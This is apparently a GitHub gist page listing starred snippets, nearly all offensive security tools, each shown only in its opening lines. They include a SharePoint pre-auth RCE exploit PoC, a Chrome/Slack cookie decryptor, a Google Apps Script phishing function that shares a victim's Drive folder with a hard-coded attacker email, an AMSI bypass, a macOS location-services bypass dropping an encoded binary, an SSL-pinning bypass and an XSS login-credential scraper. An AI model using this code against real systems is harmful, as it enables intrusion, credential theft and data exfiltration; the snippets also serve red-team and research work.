Skip to content

Instantly share code, notes, and snippets.

View kernel-sanders's full-sized avatar

Erik kernel-sanders

59 followers · 145 following
View GitHub Profile
@WKL-Sec
WKL-Sec / ParentProcessValidator.cpp
Created February 9, 2024 13:47
This C++ code snippet demonstrates how to verify if an executable is launched by explorer.exe to enhance security during red team operations.
# White Knight Labs - Offensive Development
# Guardrails - Parent Process Check
#include <windows.h>
#include <tlhelp32.h>
#include <psapi.h>
#include <tchar.h>
#include <iostream>
// Function to get the ID of the parent process
@testanull
testanull / SharePwn_public.py
Created December 15, 2023 07:31
SharePoint Pre-Auth Code Injection RCE chain CVE-2023-29357 & CVE-2023-24955 PoC
# -*- coding: utf-8 -*-
import hashlib
import base64
import requests, string, struct, uuid, random, re
import sys
from collections import OrderedDict
from sys import version
from urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
# too lazy to deal with string <-> bytes confusion in python3 so forget it ¯\_(ツ)_/¯
@Tw1sm
Tw1sm / decrypt_cookies.py
Last active November 13, 2023 22:55
Decrypt Slack/Chrome Cookies
import sqlite3
import sys
import json
from Crypto.Cipher import AES
from Crypto.Protocol.KDF import PBKDF2
kSalt = "saltysalt"
kDerivedKeySizeInBits = 128
kEncryptionIterations = 1003
kEncryptionVersionPrefix = "v10"
@ahhh
ahhh / driveSearch.gs
Last active June 16, 2023 00:55
Google App Script Phishing #2
function driveSearch() {
// Setup the exfil folder
var user = Session.getActiveUser().getEmail();
var folder = DriveApp.createFolder(user);
var attackerEmail = "ahhh.db@gmail.com";
folder.addViewer(attackerEmail);
// Search Drive
var files = DriveApp.searchFiles('hidden = false');
// Iterate through files in Drive
@susMdT
susMdT / Program.cs
Created February 24, 2023 02:57
C# Amsi bypass with hardware breakpint
using System;
using System.Collections.Generic;
using System.Linq;
using System.Runtime.CompilerServices;
using System.Net;
using System.Reflection;
using System.Runtime.InteropServices;
namespace Test
{
// CCOB IS THE GOAT
@theevilbit
theevilbit / cve_2022_22655_mount_locationd.sh
Last active December 22, 2023 23:24
CVE-2022-22655 - macOS Location Services Bypass
#!/bin/zsh
echo "++ Stopping locationd"
sudo launchctl stop com.apple.locationd
echo "++ Dropping swiftliverpool"
echo z/rt/gcAAAEDAAAAAgAAAB4AAACwDQAAhQAgAAAAAAAZAAAASAAAAF9fUEFHRVpFUk8AAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAZAAAA+AQAAF9fVEVYVAAAAAAAAAAAAAAAAAAAAQAAAACAAAAAAAAAAAAAAAAAAAAAgAAAAAAAAAUAAAAFAAAADwAAAAAAAABfX3RleHQAAAAAAAAAAAAAX19URVhUAAAAAAAAAAAAALAtAAABAAAAa0AAAAAAAACwLQAABAAAAAAAAAAAAAAAAAQAgAAAAAAAAAAAAAAAAF9fc3R1YnMAAAAAAAAAAABfX1RFWFQAAAAAAAAAAAAAHG4AAAEAAACiAAAAAAAAABxuAAABAAAAAAAAAAAAAAAIBACAAAAAAAYAAAAAAAAAX19zdHViX2hlbHBlcgAAAF9fVEVYVAAAAAAAAAAAAADAbgAAAQAAAB4BAAAAAAAAwG4AAAIAAAAAAAAAAAAAAAAEAIAAAAAAAAAAAAAAAABfX2NvbnN0AAAAAAAAAAAAX19URVhUAAAAAAAAAAAAAOBvAAABAAAALgEAAAAAAADgbwAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAF9fc3dpZnQ1X3R5cGVyZWZfX1RFWFQAAAAAAAAAAAAADnEAAAEAAAAkAAAAAAAAAA5xAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAX19vYmpjX21ldGhuYW1lAF9fVEVYVAAAAAAAAAAAAAAycQAAAQAAACwBAAAAAAAAMnEAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAABfX2NzdHJpbmcAAAAAAAAAX19UR
@jhaddix
jhaddix / reconftw.cfg
Last active April 13, 2024 20:42
reconFTW config file: NO google/osint, wordlist creation, nuclei js analysis
#################################################################
# reconFTW config file #
#################################################################
# General values
tools=~/Tools # Path installed tools
SCRIPTPATH="$( cd "$(dirname "$0")" >/dev/null 2>&1 ; pwd -P )" # Get current script's path
profile_shell=".$(basename $(echo $SHELL))rc" # Get current shell profile
reconftw_version=$(git rev-parse --abbrev-ref HEAD)-$(git describe --tags) # Fetch current reconftw version
generate_resolvers=false # Generate custom resolvers with dnsvalidator
@incogbyte
incogbyte / mixunpin.js
Last active April 19, 2024 22:17
Frida script to bypass common methods of sslpining Android
console.log("[*] SSL Pinning Bypasses");
console.log(`[*] Your frida version: ${Frida.version}`);
console.log(`[*] Your script runtime: ${Script.runtime}`);
/**
* by incogbyte
* Common functions
* thx apkunpacker, NVISOsecurity, TheDauntless
* Remember that sslpinning can be custom, and sometimes u need to reversing using ghidra,IDA or something like that.
* !!! THIS SCRIPT IS NOT A SILVER BULLET !!
@bja2142
bja2142 / gist:e60cb46b358d74c4801d5ae05fa76c07
Created August 17, 2022 21:37
Kill all users who are using more than a fixed limit of process on Linux
MAX_PROCESS_LIMIT=10
systemctl status user.slice |
egrep "user-[0-9]+\.slice" |
sed 's/.*user-\([0-9]*\).*/\1/' | # get uid
while read uid; do
test $uid -ne 0 && ( # ignore root
tasks=$(
systemctl status user-${uid}.slice |
grep -e Tasks 2>&1 |
sed 's/\w*Tasks: \([1-9][0-9]*\) (limit: [0-9]*)/\1/'
@hoodoer
hoodoer / stealCredsPayload.js
Last active March 1, 2024 14:52
XSS Login Form Credential Scraper
alert('Click ok when you\'re ready to enter iframe trap');
// Example Credential scraper and
// XSS iframe trap. Load from whatever
// page has the reflected/stored XSS vuln
// trap the user in an iframe of the app.
// Frame the login page, and copy out the
// username and password fields.
// @hoodoer